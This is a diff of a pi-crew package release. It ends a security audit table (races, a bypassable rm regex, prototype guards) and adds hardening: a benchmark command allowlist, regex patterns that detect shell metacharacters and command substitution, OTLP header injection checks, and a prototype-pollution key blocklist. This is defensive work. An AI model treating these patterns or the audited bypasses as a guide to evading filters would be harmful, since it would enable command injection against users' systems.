+| `src/config/config.ts:560` | `if (key === "__proto__" \|\| key === "constructor" \|\| key === "prototype")` | Yes — incomplete prototype guard |
+| `src/runtime/pipeline-runner.ts:248` | `this.resolveInputs(value as (string \| string[] \| Record<string, unknown>))` | Yes — type cast excludes primitives and nested arrays |
+| `src/state/mailbox.ts:270` | `MAILBOX_ARCHIVE_THRESHOLD_BYTES = 10 * 1024 * 1024` | Yes — 10MB threshold confirmed |
+| `src/state/locks.ts:78` | `finally { fs.rmSync(lockDir, { recursive: true }) }` | Yes — cleanup only in finally |
+| `src/state/active-run-registry.ts:161` | `process.kill(pid, 0)` outside lock | Yes — TOCTOU confirmed |
+| `src/runtime/child-pi.ts:153` | `allowList = ["LC_*", "XDG_*", "NVM_*", "NODE_*", "npm_*"]` | Yes — wildcard patterns confirmed |
+| `src/runtime/child-pi.ts:400` | `fs.appendFileSync(pendingFile, JSON.stringify(pendingSteers) + "\n")` | Yes — sync I/O in onSpawn |
+| `src/state/run-cache.ts:48` | `getCachedRun` then `saveRunToCache` without lock | Yes — race confirmed |
+| `src/extension/registration/commands.ts:200` | `safeRm: /rm\s+(-[a-zA-Z]*f[a-zA-Z]*\s+)?((?![\/~])\/)?(tmp\|cache\|node_modules\|dist\|build)\//` | Yes — bypassable regex confirmed |
+| `src/extension/team-tool/lifecycle-actions.ts:79` | `exportRunBundle` with no `confirm` gate | Yes — missing check confirmed |
+| `src/state/locks.ts:20` | `fs.rmSync` then retry (not atomic) | Yes — stale lock race confirmed |
+| `src/runtime/child-pi.ts:170` | `PI_TEAMS_MOCK_CHILD_PI` guard after `buildChildPiSpawnOptions` | Yes — env vars passed before mock check |
+| `src/state/schedule.ts:91` | `require("node:fs")` inside instance method | Yes — dynamic require confirmed |
+| `src/schema/config-schema.ts:85` | `disabledCapabilities: Type.Optional(Type.Array(Type.String()))` | Yes — no item-level validation |
+
+---
+
+## Recommendations
+
+1. Fix Priority 1 findings before any deployment or release.
+2. Address Priority 2 findings within the current sprint cycle.
+3. Schedule Priority 3 findings for refactoring sprints; consider extracting god modules (`team-runner.ts`, `team-tool.ts`) as a precondition.
+4. Priority 4 findings are informational; address based on long-term architecture health.
+5. For findings that span multiple files (e.g., env allowlist, sync I/O), fix both locations to prevent bypass paths.

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "pi-crew",
-  "version": "0.5.5",
+  "version": "0.5.7",
   "description": "Pi extension for coordinated AI teams, workflows, worktrees, and async task orchestration",
   "author": "baphuongna",
   "license": "MIT",
@@ -48,13 +48,13 @@
     "check:lazy-imports": "node scripts/check-lazy-imports.mjs",
     "typecheck": "tsc --noEmit && node --experimental-strip-types -e \"await import('./index.ts'); console.log('strip-types import ok')\"",
     "test": "npm run test:unit && npm run test:integration",
-    "test:unit": "node --experimental-strip-types --test --test-concurrency=4 --test-timeout=180000 --test-force-exit test/unit/*.test.ts",
-    "test:watch": "node --experimental-strip-types --watch --test --test-concurrency=4 --test-timeout=30000 --test-force-exit test/unit/*.test.ts",
-    "test:integration": "node --experimental-strip-types --test --test-concurrency=1 --test-timeout=120000 test/integration/*.test.ts",
+    "test:unit": "tsx --test --test-concurrency=4 --test-timeout=180000 --test-force-exit test/unit/*.test.ts",
+    "test:watch": "tsx --watch --test --test-concurrency=4 --test-timeout=30000 --test-force-exit test/unit/*.test.ts",
+    "test:integration": "tsx --test --test-concurrency=1 --test-timeout=120000 test/integration/*.test.ts",
     "build:bundle": "node scripts/build-bundle.mjs",
     "bench": "node scripts/run-bench.mjs",
     "bench:check": "node scripts/bench-check.mjs",
-    "test:new": "node --experimental-strip-types --test --test-concurrency=4 --test-timeout=30000 --test-force-exit test/unit/*.test.ts",
+    "test:new": "tsx --test --test-concurrency=4 --test-timeout=30000 --test-force-exit test/unit/*.test.ts",
     "test:changed": "node scripts/test-changed.mjs",
     "bench:capture": "node scripts/run-bench.mjs && node -e \"require('node:fs').copyFileSync('test/bench/results.json','test/bench/baseline.json')\"",
     "profile:startup": "node scripts/profile-startup.mjs",
@@ -80,6 +80,7 @@
   },
   "dependencies": {
     "@sinclair/typebox": "^0.34.49",
+    "acorn": "^8.16.0",
     "ajv": "^8.20.0",
     "cli-highlight": "^2.1.11",
     "diff": "^5.2.0",
@@ -93,6 +94,7 @@
     "@earendil-works/pi-coding-agent": "^0.77.0",
     "@earendil-works/pi-tui": "^0.77.0",
     "esbuild": "^0.28.0",
+    "tsx": "^4.22.3",
     "typescript": "^5.9.3"
   },
   "peerDependenciesMeta": {

package/src/benchmark/benchmark-runner.ts

@@ -32,6 +32,45 @@ export interface BenchmarkResult {
 	cost: number;
 }
 
+/**
+ * Validate command against allowlist to prevent shell injection.
+ * Only allows specific safe commands with arguments.
+ */
+/**
+ * Validate command against allowlist to prevent shell injection.
+ * Uses comprehensive shell metacharacter blocking similar to safe-bash.ts.
+ */
+function validateCommand(command: string): void {
+  // Basic allowlist - must start with allowed command
+  const allowlist = /^(pytest|grep|npm test|npx) /;
+  if (!allowlist.test(command)) {
+    throw new Error(`Command not allowed: ${command}. Only pytest, grep, npm test, npx allowed.`);
+  }
+  
+  // Block shell metacharacters after command name
+  const afterCommand = command.substring(command.indexOf(" ") + 1);
+  
+  // Block dangerous shell metacharacters
+  const dangerousPatterns = [
+    /[;&|`$(){}[\]<>\\]/,                    // Shell metacharacters
+    /\$\([^)]*\)/,                            // Command substitution $(...)
+    /`[^`]*`/,                                // Backtick command substitution
+    /\|/,                                     // Pipe
+    /&&/,                                     // And
+    /\|\|/,                                   // Or
+    />>/,                                     // Append redirect
+    /2>&1/,                                   // stderr redirect
+    />/,                                      // Output redirect
+    /</,                                      // Input redirect
+  ];
+  
+  for (const pattern of dangerousPatterns) {
+    if (pattern.test(afterCommand)) {
+      throw new Error(`Shell metacharacters not allowed in command arguments`);
+    }
+  }
+}
+
 /**
  * Run a single benchmark task with tiered judges.
  * Tier 1: pytest (fast, deterministic)
@@ -49,6 +88,8 @@ export async function runBenchmark(task: BenchmarkTask): Promise<BenchmarkResult
 			let output: string | undefined;
 
 			if (judge.type === "pytest" && judge.command) {
+				// Validate command before execution
+				validateCommand(judge.command);
 				// Tier 1: pytest - fast deterministic check
 				output = execSync(judge.command, {
 					timeout: 5000,
@@ -58,6 +99,8 @@ export async function runBenchmark(task: BenchmarkTask): Promise<BenchmarkResult
 				// Look for pytest summary line with passed count
 				passed = output.includes("passed");
 			} else if (judge.type === "grep" && judge.pattern && judge.command) {
+				// Validate command before execution
+				validateCommand(judge.command);
 				// Tier 2: grep pattern matching
 				output = execSync(judge.command, {
 					timeout: 5000,
@@ -66,6 +109,8 @@ export async function runBenchmark(task: BenchmarkTask): Promise<BenchmarkResult
 				});
 				passed = output.includes(judge.pattern);
 			} else if (judge.type === "command" && judge.command) {
+				// Validate command before execution
+				validateCommand(judge.command);
 				// Tier 3: command execution
 				output = execSync(judge.command, {
 					timeout: 10000,

package/src/benchmark/feedback-loop.ts

@@ -12,12 +12,17 @@ export interface FeedbackLoopStats {
 
 export class FeedbackLoop {
 	private runs: RunMetrics[] = [];
+	private static readonly MAX_RUNS = 1000;
 
 	/**
 	 * Record a run's metrics for learning.
 	 */
 	recordRun(metrics: RunMetrics): void {
 		this.runs.push(metrics);
+		// Trim to MAX_RUNS to prevent unbounded memory growth
+		if (this.runs.length > FeedbackLoop.MAX_RUNS) {
+			this.runs = this.runs.slice(-FeedbackLoop.MAX_RUNS);
+		}
 	}
 
 	/**

package/src/config/config.ts

@@ -244,6 +244,15 @@ function sanitizeProjectConfig(
 			sanitized.otlp = undefined;
 		warnings.push(projectOverrideWarning(projectPath, "otlp.headers"));
 	}
+	// FIX: Block project config from setting otlp.endpoint — it controls where
+	// OTLP headers (potentially containing credentials) are sent.
+	if (config.otlp?.endpoint !== undefined) {
+		if (!sanitized.otlp) sanitized.otlp = { ...config.otlp, endpoint: undefined };
+		else sanitized.otlp = { ...sanitized.otlp, endpoint: undefined };
+		if (!Object.values(sanitized.otlp).some((entry) => entry !== undefined))
+			sanitized.otlp = undefined;
+		warnings.push(projectOverrideWarning(projectPath, "otlp.endpoint"));
+	}
 	if (
 		config.agents?.disableBuiltins !== undefined ||
 		config.agents?.overrides !== undefined
@@ -300,6 +309,7 @@ function mergeConfig(
 	base: PiTeamsConfig,
 	override: PiTeamsConfig,
 ): PiTeamsConfig {
+	const warnings: string[] = [];
 	const merged: PiTeamsConfig = {
 		...base,
 		...withoutUndefined(override as Record<string, unknown>),
@@ -439,6 +449,15 @@ function mergeConfig(
 		};
 		if (Object.keys(merged.otlp.headers ?? {}).length === 0)
 			delete merged.otlp.headers;
+		// Validate OTLP headers for injection attacks (newlines, CR, null bytes)
+		const invalidHeaders: string[] = [];
+		for (const [k, v] of Object.entries(merged.otlp.headers ?? {})) {
+			if (/[\r\n\x00]/.test(String(v))) { invalidHeaders.push(k); }
+		}
+		if (invalidHeaders.length > 0) {
+			delete merged.otlp.headers;
+			warnings.push(`OTLP headers blocked due to invalid characters: ${invalidHeaders.join(", ")}`);
+		}
 	}
 	if (
 		merged.agents?.overrides &&
@@ -1041,13 +1060,28 @@ function parseOtlpConfig(value: unknown): CrewOtlpConfig | undefined {
 	if (rawHeaders)
 		for (const [key, entry] of Object.entries(rawHeaders)) {
 			if (typeof entry !== "string") continue;
-			// Prevent prototype pollution via __proto__ / constructor / prototype keys.
+			// Prevent prototype pollution via dangerous Object.prototype keys.
+			// Case-insensitive check to catch __Proto__, CONSTRUCTOR, etc.
+			const lowerKey = key.toLowerCase();
 			if (
-				key === "__proto__" ||
-				key === "constructor" ||
-				key === "prototype"
+				lowerKey === "__proto__" ||
+				lowerKey === "constructor" ||
+				lowerKey === "prototype" ||
+				lowerKey === "hasownproperty" ||
+				lowerKey === "tostring" ||
+				lowerKey === "valueof" ||
+				lowerKey === "isprototypeof" ||
+				lowerKey === "propertyisenumerable" ||
+				lowerKey === "tolocalestring" ||
+				lowerKey === "__definegetter__" ||
+				lowerKey === "__definesetter__" ||
+				lowerKey === "__lookupgetter__" ||
+				lowerKey === "__lookupsetter__"
 			)
 				continue;
+			// Validate key format: must start with letter, then alphanumeric/hyphen/underscore.
+			// Blocks CRLF, NUL, spaces, shell metacharacters in header keys.
+			if (!/^[a-zA-Z][a-zA-Z0-9_-]{0,127}$/.test(key)) continue;
 			headers[key] = entry;
 		}
 	const otlp: CrewOtlpConfig = {

package/src/config/defaults.ts

@@ -91,6 +91,11 @@ export const DEFAULT_CACHE = {
 	manifestMaxEntries: 64,
 };
 
+export const DEFAULT_MAILBOX = {
+	perFileThresholdBytes: 10 * 1024 * 1024, // 10MB per mailbox file
+	maxArchivesPerDirection: 10, // Keep at most 10 archives per direction per run
+};
+
 export const DEFAULT_SUBAGENT = {
 	stuckBlockedNotifyMs: 5 * 60_000,
 };

package/src/config/suggestions.ts

@@ -1,9 +1,17 @@
 /**
  * Fuzzy config key suggestions — Levenshtein-based typo correction for pi-crew config keys.
+ *
+ * SECURITY NOTE: The levenshtein() function processes user-supplied input and compares
+ * against a known list. While the timing variance across edit distances is minimal
+ * and the input is typically config key names (not secrets), there is a theoretical
+ * timing attack risk if an attacker could measure response times for different inputs.
+ * Risk level: LOW — mitigated by the small alphabet (config key names only) and
+ * the fixed-size DP array used in this implementation.
  */
 
 /**
  * Classic Levenshtein edit distance between two strings.
+ * See security note above regarding timing attack considerations.
  */
 export function levenshtein(a: string, b: string): number {
 	const la = a.length;